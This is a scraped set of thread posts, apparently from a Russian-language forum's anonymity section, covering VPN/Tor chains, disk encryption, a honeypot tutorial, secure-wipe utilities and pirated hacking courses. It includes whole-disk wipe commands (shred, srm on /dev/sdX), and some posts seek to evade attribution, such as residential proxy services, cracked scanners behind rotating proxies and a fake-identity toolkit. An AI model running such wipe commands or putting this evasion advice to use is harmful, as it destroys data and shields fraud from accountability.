ext:geosite_v2fly.dat:category-ads-all — реклама

ext:geosite_v2fly.dat:category-gov-ru — государственные сайты РФ

ext:geosite_v2fly.dat:win-spy — домены для шпионажа Windows

ext:geosite_v2fly.dat:win-update — домены для обновления Windows

ext:geosite_v2fly.dat:win-extra — домены для шпионажа и обновления Windows

Использовать с осторожностью

ext:geosite_antizapret.dat:ZAPRETINFO — AntiZapret

ext:geosite_antifilter.dat — Доменные имена списка AntiFilter

Spoiler: Полезные категории GeoIP

ext:geoip_antifilter.dat — IP списка AntiFilter

ext:geoip_v2fly.dat:ru — IP в зоне РФ

ext:geoip_v2fly.dat:cloudflare — IP адреса CloudFlare

ext:geoip_v2fly.dat:cloudfront — IP адреса CloudFront

ext:geoip_v2fly.dat:facebook — IP адреса Facebook

ext:geoip_v2fly.dat:fastly — IP адреса Fastly

ext:geoip_v2fly.dat:google — IP адреса Google

ext:geoip_v2fly.dat:netflix — IP адреса Netflix

ext:geoip_v2fly.datwitter — IP адреса Twitter

ext:geoip_v2fly.dat:private — IP адреса локальных сетей

При использовании встроенного proxy-клиента keenetic

В политиках не поднимайте proxy-подключение выше основного
Из-за особенностей встроенного клиента подключение не будет работать

Применяйте proxy-политику к конкретным клиентам

В Proxy-подключении должно быть включено «Использовать для выхода в интернет»

После настроенного на роутере Xray — его можно использовать в качестве портала. При этом дополнительные настройки конфигурации не нужны. Задача решается IKE подключением по инструкции Keenetic.

Автор @Skride
Источник habr.com

Помогите с цепочкой

ID: 676533bbb4103b69df371c0c
Thread ID: 50336
Created: 2021-04-06T06:44:50+0000
Last Post: 2021-04-07T16:25:07+0000
Author: pinkdeath
Replies: 3 Views: 611

Есть ВПН WindscribePro и Socks5
Как выстроить цепочку, чтобы не оставлять следа в сети .Я параноик и мне не совсем понятно как это сделать?
Спасибо.

Шифрование дисков

ID: 676533bbb4103b69df3719ec
Thread ID: 101251
Created: 2023-10-29T21:31:57+0000
Last Post: 2023-11-07T21:26:16+0000
Author: l333t
Replies: 10 Views: 610

Ребят встал вопрос по шифрованию дисков чем шифровать по Veracrypt вопросы так как Elcomsoft умеет из оперативки дергать да и впринцпие то что массово используют на это уже будет средство противодействия хотел попробавать LUKS или что нибудь еще что посоветуете и может какие нибудь схемы с апаратными ключами.

Нужна помошь в простроении инфраструктуры

ID: 676533bbb4103b69df371ba2
Thread ID: 56055
Created: 2021-08-30T19:30:10+0000
Last Post: 2021-09-24T22:33:08+0000
Author: wesker
Replies: 11 Views: 608

Добрый вечер, пошу помощи в следующем вопросе:
Имею 3 виртуальных машины на vmware, тип подключения к сети NAT.
Как создать общее централизованное подключение к Tor сети. Пробовал решение с Ubuntu + tor в качестве proxy локально все работает, остальные машины подключить не могу.

WhatsApp и Telegram не приватен.

ID: 676533bbb4103b69df3719a0
Thread ID: 108531
Created: 2024-02-18T16:04:29+0000
Last Post: 2024-02-20T08:51:28+0000
Author: ThorZirael
Prefix: Видео
Replies: 6 Views: 606

Для тех кому лень смотреть видео: провайдера ведут нетфлоу логи, звонки это VoIP, по дефолту во всех 4-х месседжера, таких как телега, ватсап, вайбер и сигнал это peer to peer.
Провайдеры знают что наш ip = наш номер, наш номер = ФИО, адрес и тд. Соответственно те кто владеют логами и инфой от двух провайдеров владеют нашей детализацией в мессенджерах.
Суть видео в том, что убираем галочку с p2p в настройках звонков в мессенджерах или еще лучше ставим VPN \ proxy с шифрованием.

P.S. приглашаю HostBost и _lain показать как нужно писать статьи и делать видео, а не заниматься инфоцыганством как я, но дизлайк поставить легче, поэтому жду от вас только дизлайк.

device id imei changer xposed

ID: 676533bbb4103b69df371a3b
Thread ID: 92756
Created: 2023-07-12T12:30:06+0000
Last Post: 2023-07-14T16:32:01+0000
Author: Jake
Replies: 13 Views: 604

Есть что-то вроде такой же проги только для 13 андроида? или 12 хотя бы
А если нет, то есть ли какой-то скрипт для термукса, который это будет менять?
Задача быстро менять IMEI, Android Id, Serial Number, Wifi Mac Address and service set identifier (SSID) of the current wifi network

[ Device Id IMEI Changer Xposed APK for Android Download

](https://apkpure.com/device-id-imei-changer-xposed/com.phoneinfo.changer)

Device Id IMEI Changer Xposed 1.5.5 APK download for Android. Xposed module to change IMEI,Android id,Serial,Wifi mac address and wifi name.

apkpure.com

Обернуть конкретную службу Linux в socks5 proxy

ID: 676533bbb4103b69df371a88
Thread ID: 80564
Created: 2023-01-24T07:16:29+0000
Last Post: 2023-02-01T18:12:21+0000
Author: kazakboo
Replies: 10 Views: 601

Сабж, есть какие то варианты кроме iptables, что-нибудь более дружелюбное ?
По идее нужно запустить крякнутый acunetix(в крякнутой версии как я понял не работает нативная поддержка прокси) с возможностью эти прокси на лету менять.

Коммерческие впн

ID: 676533bbb4103b69df371c9c
Thread ID: 42266
Created: 2020-09-19T15:43:45+0000
Last Post: 2020-09-19T19:49:46+0000
Author: negg
Replies: 1 Views: 598

Что требует от коммерческих впн в европе. При создании компании

безопасность сервера

ID: 676533bbb4103b69df371bbf
Thread ID: 55384
Created: 2021-08-16T13:32:04+0000
Last Post: 2021-08-16T14:21:15+0000
Author: fraud
Replies: 6 Views: 595

Можно ли хранить данные на сервере, чтобы хостер не мог получить к ним доступа?
думаю, можно на сервере сделать виртуалку и файл с ней зашифровать. это поможет?

Vip72 alternative

ID: 676533bbb4103b69df371b5b
Thread ID: 61179
Created: 2022-01-11T06:28:10+0000
Last Post: 2022-01-18T19:53:25+0000
Author: cashearner
Replies: 3 Views: 594

Since vip72 is down, what are the alternatives?

IVPN, обсуждение (халявные аккаунты)

ID: 676533bbb4103b69df371916
Thread ID: 125573
Created: 2024-10-26T10:52:36+0000
Last Post: 2024-10-26T13:12:34+0000
Author: petrinh1988
Replies: 10 Views: 590

Скинули ссылку на одну интересную страничку IVPN. Суть такая, что из-за происходящего, они решили выдать бесплатные аккаунты для жителей Украины, России и Беларуси. Цитата:

"Помимо внутренних мер и этого заявления, мы хотим помочь всем, кого это касается, предлагая бесплатный сервис VPN. Некоторые цифровые каналы связи отключены или ограничены в Украине , а в России подвергаются все большей цензуре . Мы раздаем бесплатные подписки всем в этих двух странах, чтобы они могли попытаться обойти текущие и будущие ограничения. "

В связи с чем есть два вопроса:

1. Кто-то пользовался этим предложением?
2. Насколько это безопасно? Что-то мне подсказывает, что не будет никто просто так раскидываться доступами к ВПН. Ну не верю я в сказки. Понятное дело, что представители чистой и светлой демократии хотят, чтобы я мог спокойно поглащать их тезисы... но больше интересует не возжелали ли они плотно анализировать мой трафик?

Просто увидев радостную весть подумалось, насколько вообще безопасно пользоваться их впнкой?

Riseup, обсуждение, отзывы?

ID: 676533bbb4103b69df371a7e
Thread ID: 77321
Created: 2022-12-04T08:19:08+0000
Last Post: 2023-04-03T10:50:16+0000
Author: baeafeqjsb
Replies: 7 Views: 589

Прошу не писать свой сервер (поднять свой VPN), нужен выбор стран.

Безопасно ли загружать с чужих ПК свою ОС на внешнем носителе?

ID: 676533bbb4103b69df37191c
Thread ID: 124226
Created: 2024-10-06T14:47:26+0000
Last Post: 2024-10-12T13:12:14+0000
Author: Gidis
Replies: 3 Views: 589

Как долго хранятся данные в журнале биоса? Например, может ли владелец компьютерного клуба отследить мои пароли и посещаемые сайты если я использую прокси и впн?

хостинг для поднятия своего впн

ID: 676533bbb4103b69df3718fa
Thread ID: 127589
Created: 2024-11-25T15:12:14+0000
Last Post: 2024-11-26T22:29:56+0000
Author: Fedya_68
Replies: 9 Views: 588

Подскажите какой хостинг лучше использовать, какими вы польщуетесь. И чтобы он данные не сливал

Как лучше криптовать файлы перед выгрузкой в облако

ID: 676533bbb4103b69df371967
Thread ID: 115251
Created: 2024-05-24T05:40:50+0000
Last Post: 2024-05-24T08:37:32+0000
Author: Zabuza
Replies: 1 Views: 588

Только без проприетарного софта. И с медленным хешем, чтобы от брута защита была.

Разбираем, расставляем honeypots для поимки хищников, атакующих нашу инфраструктуру. [Part 1]

ID: 676533bbb4103b69df37192d
Thread ID: 123171
Created: 2024-09-20T17:32:31+0000
Last Post: 2024-09-20T17:32:31+0000
Author: n0_mad
Prefix: Статья
Replies: 0 Views: 587

**Автор: NomadSP
Источник: XSS.is

Создаём honeypot в корпоративной сети, анализируя угрозы.**
Honeypot — опция, предназначенная для отвлечения внимания злоумышленников и анализа их действий внутри вашей инфраструктуры при попытке воздействия на неё. Данная опция важна для выявления уязвимостей, а так же позволяет протестировать системы безопасности и собрать данные об актуальных методах атак на вашу сферу деятельности и корпоративную сеть.

Подготовка.
Для начала необходимо определить тип honeypot.
В основном, выделяются 2 типа:
1. Низкоуровневый(Low-Interaction), эмулирующие ограниченное количество сервисов и служб, не предоставляя полноценное окружение.
- Реагирует, например, на взаимодействия с SSH / HTTP.
- Собирает аналитические данные без вреда для основной системы.
- Прост в установке и не требует большого количества ресурсов.

2. Высокоуровневый(High-Interaction) , предоставляющие полноценное окружение с реальными операционными системами и сервисами, позволяя взаимодействовать с системой так, как если бы это была настоящая цель.
- Полноценные виртуальные машины или контейнеры с установленными сервисами и приложениями.
- Получение более обширных аналитических данных, а так же детальной информации о компрометации и пост-эксплуатации.
- Возможность мониторинга атак и логгирования действий.

Low-Interaction.
Для низкоуровневых honeypot мы будем использовать Cowrie, который позволит нам имитировать SSH и Telnet.

1. Установим необходимые пакеты.

Bash:Copy to clipboard

sudo apt install git python3 python3-pip python3-virtualenv -y

2. Копируем репозиторий Cowrie.

Bash:Copy to clipboard

git clone https://github.com/cowrie/cowrie.git

Bash:Copy to clipboard

cd cowrie

3. Создаём виртуальное окружение Cowrie.

Bash:Copy to clipboard

virtualenv cowrie-env

Bash:Copy to clipboard

source cowrie-env/bin/activate

4. Устанавливаем зависимости.

Bash:Copy to clipboard

pip install -r requirements.txt

На этом мы установили Cowrie на нашу Linux систему, однако нам необходимо теперь так же её настроить, чтобы по итогам конфигурации мы получали необходимый результат.

Click to expand...

5. Редактируем конфигурационный файл.

Bash:Copy to clipboard

nano cowrie.cfg

Нам необходимо изменить следующие параметры:
1. hostname - задаём имя honeypot.
2. listen_port - указываем порт, который будет "прослушиваться" с помощью honeypot (например, 2222 или 22 для SSH).

6. Сохраняем изменения в конфигурации.

7. Делаем, чтобы Cowrie запускался как служба.

Для этого создадим файл типа systemd.

Click to expand...

Bash:Copy to clipboard

sudo nano /etc/systemd/system/cowrie.service

После этого необходимо добавить следующее содержимое:

[Unit]
Description=Cowrie SSH/Telnet Honeypot
After=network.target

[Service]
Type=simple
User=your_username # Замените на имя пользователя
WorkingDirectory=/path/to/cowrie # Укажите путь к каталогу cowrie
ExecStart=/path/to/cowrie/cowrie-env/bin/python3 /path/to/cowrie/bin/cowrie start
Restart=on-failure

[Install]
WantedBy=multi-user.target

Click to expand...

Не забываем заменить "/path/to/cowrie" на фактический путь к директории.

8. Запускаем сервис и настраиваем автозагрузку.

Bash:Copy to clipboard

sudo systemctl start cowrie.service sudo systemctl enable cowrie.service

9. Проверяем статус работы системы.

Bash:Copy to clipboard

sudo systemctl status cowrie.service

При успешном отклике мы можем считать настройку успешной. Однако, нам важно анализировать данные, которые позволят нам корректировать собственные защитные линии. Все логи хранятся по пути: cowrie/log

Поэтому, для просмотра действий с honeypot в вашей инфраструктуре используем:

Bash:Copy to clipboard

tail -f cowrie/log/cowrie.log

High-Interaction.
Для высокоуровневых honeypot мы будем использовать более комплексный инструмент, поэтому для примера возьмём Dionaea.

1. Установим необходимые для работы пакеты.

Bash:Copy to clipboard

sudo apt update sudo apt install git build-essential python3 python3-pip python3-dev libssl-dev \ libffi-dev libtool automake autoconf libglib2.0-dev libpcap-dev \ libsqlite3-dev libcurl4-openssl-dev libgcrypt20-dev libnetfilter-queue-dev \ libnetfilter-conntrack-dev

2. Копируем репозиторий Deonaea.

Bash:Copy to clipboard

git clone https://github.com/DinoTools/dionaea.git cd dionaea

3. Компилируем Dionaea.

Bash:Copy to clipboard

./autogen.sh ./configure make

4. Проводим настройку конфигурационного файла.

Обычно файл находится по адресу dionaea/etc/dionaea.conf, но применим команду:

Bash:Copy to clipboard

nano etc/dionaea.conf

Необходимо уделить внимание важным параметрам:
- [http]: Настройки HTTP. Например: "port = 80"
- [ftp]: Настройки FTP. Например: "port = 21"
- [sip]: Настройки SIP (если это применимо).
- [logging]: Настройки логирования. Например: "logfile = /var/log/dionaea.log"

Click to expand...

5. Создаем базу данных SQLite.

Dionaea использует MySQL и SQLite для хранения данных, поэтому рассмотрим создание именно второго варианта.

Bash:Copy to clipboard

mkdir -p /var/lib/dionaea touch /var/lib/dionaea/dionaea.sqlite

Не забываем проверить, что у Dionaea есть права записи:

Click to expand...

Bash:Copy to clipboard

sudo chown -R $(whoami):$(whoami) /var/lib/dionaea

6. Запускаем Dionaea.

Bash:Copy to clipboard

sudo ./dionaea/dionaea -c etc/dionaea.conf

7. Добавляем опцию автозапуска системы.

Bash:Copy to clipboard

sudo nano /etc/systemd/system/dionaea.service

Добавляем следующие строки:

[Unit]
Description=Dionaea Honeypot

[Service]
Type=simple
ExecStart=/path/to/dionaea/dionaea -c /path/to/dionaea/etc/dionaea.conf
Restart=on-failure

[Install]
WantedBy=multi-user.target

Click to expand...

Не забываем заменить "/path/to/dionaea/" на нужный нам путь.

8. Активируем и запускаем сервис.

Bash:Copy to clipboard

sudo systemctl enable dionaea.service sudo systemctl start dionaea.service

9. Логирование.

Как и в случае с Cowrie, мы используем аналогичную команду для просмотра логов:

Bash:Copy to clipboard

tail -f /var/log/dionaea.log

Complexity is the key.
Мы рассмотрели опцию настройки honeypot для высокоуровневых и низкоуровневых типов. Однако, подобные решения скорее представляют из себя точечные или даже костыльные меры, поскольку требуют довольно много настроек и внимания со стороны master-user, а так же скорее направлены на какой-то конкретный раздел.

В качестве комплексного решения для обеспечения безопасности вашей инфраструктуры, с точки зрения обеспечения корпоративной кибебезопасности, можно использовать такой инструмент как Illusive Shadow(Proofpoint).

Поскольку Illusive Shadow имеет возможность имитации различных сетевых сервисов таких как SSH, HTTP и FTP для привлечения внимания, а также приложений, то этот инструмент, за счёт удобных опций настройки является одним из оптимальных решений.

Помимо самого варианта создания honeypot'ов, каждый сотрудник ИБ и знтузиаст может найти для себя и другие функции, которые будут полезны в процессе работы над обеспечением безопасности систем:
- Сбор данных для последующего анализа.
Платформа собирает данные о IP, типах угроз, используемых инструментах.
- Имеет интеграцию AI+ML, что позволяет адаптировать поведение защиты в случае угрозы.
- Интеграция с SIEM для получения обширного спектра возможностей интеграции с текущими системами безопасности для централизованного мониторинга.

Однако, считаю, что настройке такой системы должна быть посвящена отдельная статья.

Заключение.
Использование honeypot как меры обеспечения безопасности может сослужить хорошую службу, исходя из всех аналитических данных. Поскольку есть вариация использования таких ловушек для отвлечени внимания, теста гипотез, определения векторов атак, оптимизации работы системы безопасности, то понимание принципов работы и вытекающие отчёты являются клдчами в общей связке для достижения необходимого уровня безопасности организации.

TOR + proxychains + AnyConnect

ID: 676533bbb4103b69df371931
Thread ID: 122490
Created: 2024-09-11T06:21:27+0000
Last Post: 2024-09-11T07:12:19+0000
Author: smitmash
Replies: 4 Views: 585

Спрошу экспертов. Будет ли такое подключение скрывать ваш реальный IP при подключении к VPN на Windows?
TOR Browser
CFG torrc

Code:Copy to clipboard

SocksPort 9050

proxychains.conf

Code:Copy to clipboard

[ProxyList] socks5 127.0.0.1 9050

Подключаемся:
proxychains.exe -f "C:\Users\test\proxychains\proxychains.conf" "C:\Program Files (x86)\Cisco\Cisco Secure Client\vpncli.exe" connect 5.XX.XX.XX

Силовики следят за соцсетями свердловчан, используя программы на основе слитых баз данных

ID: 676533bbb4103b69df37194f
Thread ID: 117274
Created: 2024-06-21T06:28:28+0000
Last Post: 2024-06-21T06:28:28+0000
Author: ShadowHawk
Replies: 0 Views: 584

В прошлом году ГУ МВД по Свердловской области закупило программу «Демон Лапласа», которая позволяет следить за социальными сетями пользователей. Она включает модуль «Инсайдер» — через нее силовики могут деанонимизировать пользователей Telegram. Соответствующая госзакупка есть на сайте «Единый агрегатор торговли», обратил внимание журналист Андрей Захаров*.

Фото: скриншот видео с демонстрацией модуля «Инсайдер»

Контракт по покупке лицензии свердловская полиция заключила в августе 2023 года. «Демон Лапласа» предназначен для круглосуточного мониторинга групп, чатов или аккаунтов в соцсетях «ВКонтакте», «Одноклассники», мессенджере Telegram и онлайн-СМИ. Стоимость лицензии — 500 тысяч рублей. Разработал программу ИП Евгений Венедиктов из Великого Новгорода.

По данным с сайта разработчика, «Демон Лапласа» используют для конкурентной разведки, мониторинга брендов, а также поиска экстремистского контента — запрещенных текстовых публикации, аудио и видео.

Модуль «Инсайдер»

На сайте разработчика сообщается, что в состав «Демона Лапласа» входит модуль Insider Telegram, который дополняет мониторинг каналов и групп мессенджера. Он позволяет силовикам деанонимизировать пользователей Telegram. Работает это так: пользователь вводит известные ему ID, username в мессенджере или номер телефона человека, а программа показывает связанные с ним ФИО, почту, домашний адрес, аккаунты в соцсетях и базах данных частных компаний. Также в результатах поиска есть информация о чатах, в которых состоял человек, какие сообщения он в них оставлял.

Среди выгруженных сообщений пользователей есть поиск по ключевым словам. Систему можно настроить так, чтобы она автоматически уведомляла о новых сообщениях конкретных пользователей или постах по определенным ключевым словам. С помощью модуля полицейские также могут выгружать информацию об участниках каналов и групп мессенджера. Все публичные группы разделены на кластеры, среди них есть «СВО-Украина», «Протест», «Анархисты».

Как работает «Инсайдер»

По словам Захарова, модуль «Инсайдер» [работает](https://telegra.ph/Siloviki- i-chinovniki-ispolzuyut-slitye-bazy-chtoby-deanonit-polzovatelej-Telegram-Za- byudzhetnye-dengi-03-06) на основе информации из слитых баз данных. Номера телефонов пользователей берут в том числе из утекших баз «Яндекс. Еды», Wildberries, «Спортмастера», «Сбер.Спасибо», «Московской электронной школы».

Сейчас база данных Insider включает 76 млн телефонных номеров. Если в ней нет совпадений по ID, система попытается найти информацию о нужном человеке через боты в Telegram — они тоже работают на данных из слитых баз. По словам Захарова, не спасет даже то, что человек скрыл в мессенджере телефон.

Жителей Свердловской области не раз наказывали за посты в соцсетях и мессенджерах впо административным и уголовным «политическим» статьям. Например, Верх-Исетский районный суд Екатеринбурга на 15 суток [арестовал](https://itsmycity.ru/2024-04-28/sud-v-ekaterinburge-arestoval- muzhchinu-za-publikaciyu-emodzi-belosinebelogo-flaga) жителя Березовского Владимира Иванова за историю в Telegram с эмодзи бело-сине-белого флага по статье о демонстрации нацистской символики. Центральный окружной военный суд [приговорил](https://itsmycity.ru/2024-02-27/sud-prigovoril-uralskogo- piarshika-shirshikova-k-zapost-osmerti-voenkora-vladlena-tatarskogo) пиарщика Ярослава Ширшикова к двум годам лишения свободы по статье об оправдании терроризма из-за поста в телеграм-канале.

Источник: [https://itsmycity.ru/2024-05-11/sil...spolzuya-programmy-naosnove- slityh-baz-dannyh](https://itsmycity.ru/2024-05-11/siloviki-sledyat- zasocsetyami-sverdlovchan-ispolzuya-programmy-naosnove-slityh-baz-dannyh)

Софт для очистки диска без возможности восстановления

ID: 676533bbb4103b69df371ca1
Thread ID: 41836
Created: 2020-09-07T10:38:09+0000
Last Post: 2020-09-07T10:38:09+0000
Author: tabac
Replies: 0 Views: 583

shred
Утилита shred переписывает несколько раз указанные файлы для того, чтобы сделать более сложным восстановление даже с использованием очень дорогого оборудования.
shred использует три прохода, записывая при каждом проходе на устройство псевдослучайные данные. Количество таких перезаписей может быть уменьшено или увеличено.
Следующая команда запускает shred со стандартными настройками и отображением прогресса:

Code:Copy to clipboard

shred -v /dev/sdX

Также можно запустить shred для одного прохода, с энтропией, например, из /dev/urandom:

Code:Copy to clipboard

shred --verbose --random-source=/dev/urandom -n1 /dev/sdX

wipe
Утилита wipe специализируется на стирании файлов. Для быстрого стирания вы можете использовать её примерно так:

Code:Copy to clipboard

wipe -r -q /путь/для/затирания

Wipe надёжно работает только для магнитной памяти, следовательно, для твердотельных дисков (памяти) используйте другие методы.

secure-delete (srm, sfill, sswap)
Пакет secure-delete включает в себя три утилиты srm, sfill, sswap, которые безопасно очищают файлы, диски, раздел подкачки и память.
srm выполняет безопасную перезапись/переименование/удаление целевого файла(ов).
sfill выполняет безопасную перезапись свободного пространства на разделе, в котором находится указанная директория и всех свободных индексных дескрипторов (inode) указанного каталога.
sswap делает безопасную перезапись раздела подкачки.
Запуск srm со стандартными (безопасными) настройками с более подробным выводом для стирания диска /dev/sdX:

Code:Copy to clipboard

srm -v /dev/sdX

Другие программы, которые также могут использоваться для стирания данных: dd , Badblocks(из пакета e2fsprogs), hdparm.

Подключение к впн

ID: 676533bbb4103b69df371ca4
Thread ID: 41748
Created: 2020-09-04T10:04:43+0000
Last Post: 2020-09-04T19:06:40+0000
Author: negg
Replies: 3 Views: 583

Допустим у меня 2 аккаунта в телеграмм. 1 - основной. 2 - фейк (с виртуальным номером). Так вот,непонятна ситуация с впн. Допустим основным аккаунтом я пользовался месяц,потом решил завести фейковый,завел фейковый,и открываю фейк аккаунт с помощью впн. Но на основном аккаунте без впн. Вопрос,то что я включаю впн на фейк акк - бесполезно в данном случае? Или не так записываются логи. И еще,если я случайно забыл включить впн и открыл фейковый аккаунт,то уже спалил истинный айпи и смысла нет уже дальше использовать впн,для сокрытия истинного айпи!?

Вопрос по связке vpn+tor+proxy

ID: 676533bbb4103b69df371c3e
Thread ID: 48177
Created: 2021-02-16T09:54:36+0000
Last Post: 2021-02-16T19:21:54+0000
Author: Wistnano
Replies: 5 Views: 581

Настроил связку так: на основной машине включил NordVPN, на VirtualBox пустил весь трафик через Tor с помощью Proxifier, а Firefox настроил через 911. Прошу уважаемых знатоков прояснить, идёт ли сейчас трафик в Firefox как vpn->tor->proxy ? Или я рукожоп и что-то не учёл и сдеанонят изи ?

Вопрос о 911.re прокси

ID: 676533bbb4103b69df371c0f
Thread ID: 50326
Created: 2021-04-05T20:33:23+0000
Last Post: 2021-04-06T16:34:31+0000
Author: Vodoley
Replies: 4 Views: 577

Здравствуйте.
Видел на форуме говорили о резидентных прокси, которые покупают сразу же пачкой и навсегда.
Заинтересовало, купил. Ожидал получить присок ip:port:country:city:zip:isp, а оказалось прокси выдаются из софта и проксируется все самим софтом.
Совсем не то чего я ожидал.
Возможно ли получить данные этих прокси в виде txt файла как обычные socks5 и проксировать самостоятельно без их софта?
Заранее спасибо!

Fake identity - OSINTAnonimus (Набор инструментов для создания поддельной личности "sock puppet")

ID: 676533bbb4103b69df371a90
Thread ID: 77963
Created: 2022-12-12T19:40:56+0000
Last Post: 2022-12-12T19:40:56+0000
Author: Pirate
Replies: 0 Views: 576

Генераторы поддельных данных
Генераторы поддельных лиц
Услуги временных адресов электронной почты/телефонных номеров
Инструкция по анонимности профиля для разных социальных сетей и мессенджеров

[ GitHub - CScorza/OSINTAnonymous: Creazione d'identità Fake -

Impostazione Privacy Profili Social - Creazione Ambiente di Lavoro ](https://github.com/CScorza/OSINTAnonimus)

Creazione d'identità Fake - Impostazione Privacy Profili Social - Creazione Ambiente di Lavoro - GitHub - CScorza/OSINTAnonymous: Creazione d'identità Fake - Impostazione Privacy Profili S...

github.com

Мобильный VPN (VPN на телефон)

ID: 676533bbb4103b69df371a79
Thread ID: 84158
Created: 2023-03-20T11:06:51+0000
Last Post: 2023-04-08T02:49:06+0000
Author: ficker22
Replies: 9 Views: 569

С недавнего времени ни один нормальный VPN, типа протона или норда (с подпиской), не коннектится к серверу с мобильного интернета.
Подскажите, есть ли другие адекватные сервисы, которые работают с мобильным интернетом или есть способы обфускации для вышеупомянутых VPN.
На счет того, что можно поднять свой сервер в курсе

АПИ с функционалом whatleaks

ID: 676533bbb4103b69df371c2d
Thread ID: 48613
Created: 2021-02-25T10:40:56+0000
Last Post: 2021-02-26T23:21:19+0000
Author: user908768
Replies: 3 Views: 568

Нужен сервис, предоставляющий API с функционалом whatleaks.com.
Что посоветуете?

Как пропустить трафик из соц. сетей через ТОR

ID: 676533bbb4103b69df371972
Thread ID: 112915
Created: 2024-04-19T20:21:56+0000
Last Post: 2024-05-13T07:05:20+0000
Author: Asian Fetish
Prefix: Мануал/Книга
Replies: 3 Views: 567

Для чего вообще нужно это? Покажу на примере жаббера:
При подключении к серверу жаббера с вашего компьютера отправляются запросы на IP-адрес сервера. Кому это известно?

Серверу.

Провайдеру.

Если с первым всё понятно и вы можете поднять свой собственный сервер или использовать доверенные серверы (например, thesecure.biz, exploit.im), чтобы избежать логирования и не беспокоиться об этом, то со вторым всё сложнее.

Предположим, у вашего знакомого майора есть IP-адрес сервера и он заставил провайдера установить фильтр для этого сервера. Когда вы подключаетесь к серверу, благодаря фильтру ваш IP-адрес попадает в подозрительные и начинают его пробивать. И там может что-то уже и выявиться. Короче говоря, это небезопасно.

Чтобы направить трафик через Tor в любой программе, достаточно указать в качестве прокси-сервера 127.0.0.1:9150 или 127.0.0.1:9050. Если вам нужно перенаправить трафик через Tor в другой программе, вы можете скачать программу для прокси и ввести этот IP-адрес и порт там. Однако данная статья не об этом, поэтому перейдем к популярным мессенджерам :

ВАЖНО! Не забудьте включить Tor браузер и присоедениться к сети Tor.
Трафик будет проходить через Tor до тех пор, пока вы не закроете Tor.

Telegram

Независимо от того, кто что может сказать о Telegram , он частично обеспечивает анонимность и приватность. Кроме того, он очень популярен.
Перейдите в раздел "Настройки".

Затем выберите "Продвинутые настройки".

Выберите "Тип соединения" и включите "Использовать собственный прокси ".

Выберите тип прокси SOCKS5 , введите в поле "Хост" 127.0.0.1, а в поле "Порт" введите 9150 или 9050.

Готово! Теперь весь ваш трафик в Telegram будет проходить через Tor.

Jabber

Рассмотрим на примере программы Pidgin , хотя в других программах процесс будет примерно аналогичным.

Перейдите в настройки -> прокси. Выберите тип прокси Tor /Конфиденциальность (SOCKS5), укажите узел 127.0.0.1 и порт 9150 или 9050.
Также установите флажок "Использовать удаленный DNS с прокси SOCKS4 ".

Нажмите "Закрыть". Поздравляю! Теперь весь ваш трафик в мессенджерах будет проходить через Tor.

Если в других мессенджерах есть такая возможность, установите флажки на прокси и введите 127.0.0.1:9150 или 127.0.0.1:9050.
Спасибо за внимание.

Cyber security course.(Full courses)

ID: 676533bbb4103b69df3719cf
Thread ID: 103829
Created: 2023-12-10T09:18:57+0000
Last Post: 2023-12-28T22:56:25+0000
Author: blackhunt
Replies: 3 Views: 566

Cyber Security (includes Hacking Cracking Passwords, Penetration Testing, Website Hacking etc) huge topic, and it can be challenging to know where to start. So I arranged Everything from the very Basics To Advanced Level.
Requirements:

️ A Clear Mindset.
️ A Brain.
️ And Patience

️Most Important Steps Are From 1 - 4. (Don’t skip anything, Everything is in order
and download the courses in small parts in order.)

Step

1

Tryhackme: Beginner Level
Visit the link given Below And that Website Will Teach you Every Basic That You Must Know Before Starting Your Career in Cyber Security.

Link

https://tryhackme.com/hacktivities

️Now, Pre Security only -

How The WebWorks
Windows Fundamentals

Step

2

Networking - Networking is the most important thing in this field. You should know how the internet works, Wifi, IPV4, IPV6, Modem & Routers, TCPIP

TOTAL CompTIA A+ Certification ️ (220-1002):

️Mega Link - https://mega.nz/folder/zSpnzKKD#UPhqD2NZBoM3ImhvMsx9qA

Step

3

CompTIA Network+ Cert. (N10-007) The Total Course part:
️Mega Link - https://mega.nz/folder/fC5njSyR#NMw88ZzRaYhDTSmYewodXA

Step

4

️Linux Essentials For Hackers:
️Mega Link - https://mega.nz/folder/mSZm0ToD#eHVXlQEZqjvy7wtOjr6bsQ

oR

Linux Fundamentals (only if you have much time)
️Mega Link - https://mega.nz/folder/bWAzhIpK#75a7aku_sRt6xELqZx4Rtw

Step

5:
Programming Languages

C/C++ - (don’t need to do both … only 1 of these)
[C++ recommend because it can be used for other purposes also and its has OOPs also]

C++ Programming For Beginners- From Beginner to Beyond
️Mega Link - https://mega.nz/folder/mHojiKDQ#3Elcoz07kRO_wHNsqGSSyg

C Programming For Beginners - Master the C Language
️Mega Link - https://mega.nz/folder/Hep3WCyL#edxDM0t-hLe56aXVJMb1Zg

NOTE

First learn C/c++ Language before start hacking. You can learn other languages while learning hacking at the same time/day.

Python courses are given at the bottom (you can do python now or after learning Basic ethical hacking.)

SQL - Sql is one of the important languages in this field because there are many attacks. If we have good knowledge about SQL we can exploit databases with more ease.

The Ultimate MySQL Bootcamp Go from SQL Beginner to Expert:
️Mega Link - https://mega.nz/folder/LS4FBKwI#2JKm18_PJngL8Fc4MP7mcw

The next one is Javascript

Javascript for Pentesters 1:

️Mega Link - https://mega.nz/folder/ya5W0Lxa#Ocx3Gbtkv8PqSzzSpG6PfA

Javascript for Pentesters 2:

️Mega Link - https://mega.nz/folder/ub40ARZD#TmsUGA1MK4_-lVbRvJG-QQ

Step

6

You Start Learn Hacking now (courses are arranged in order)(don't skip step).

Hacking in Practice Intensive Ethical Hacking MEGA Course:

️Mega Link - https://mega.nz/folder/STp0RTgI#9evucI3TuA4ovRHwIzkZjw

Learn Ethical Hacking From Scratch:

️Mega Link - https://mega.nz/folder/uOhmlJDK#XurLsSfc4Q_2lqir8__7xQ

Network Hacking Continued - Intermediate to Advanced:

️Mega Link - https://mega.nz/folder/rDwizT6T#cfvtFj1U5NSML8A9e9WKKg

Website Hacking Penetration Testing & Bug Bounty Hunting:

️Mega Link - https://mega.nz/folder/rLwGFBqL#fypM_Tl6_PqMLDllXPhdhw

Intro to Bug Bounty Hunting and Web Application Hacking:

️Mega Link - https://mega.nz/folder/HD5kFLIb#0GL5H-vCZ97egfYQDgGHOg

Practical Ethical Hacking - The Complete Course

️Mega Link - https://mega.nz/folder/CKwkRTgD#eyLfo_HAvRIDZ7hJO_1N7w

Learn Python & Ethical Hacking From Scratch:

️Mega Link - https://mega.nz/folder/vTgRBCBQ#-NcoMXnPAoQ1YnT7ywpwWw

️Complete Hacking Tools in Kali Linux:

️Mega Link - https://mega.nz/folder/OShBhKQa#AsIpstxQ_B3At405IbhsfA

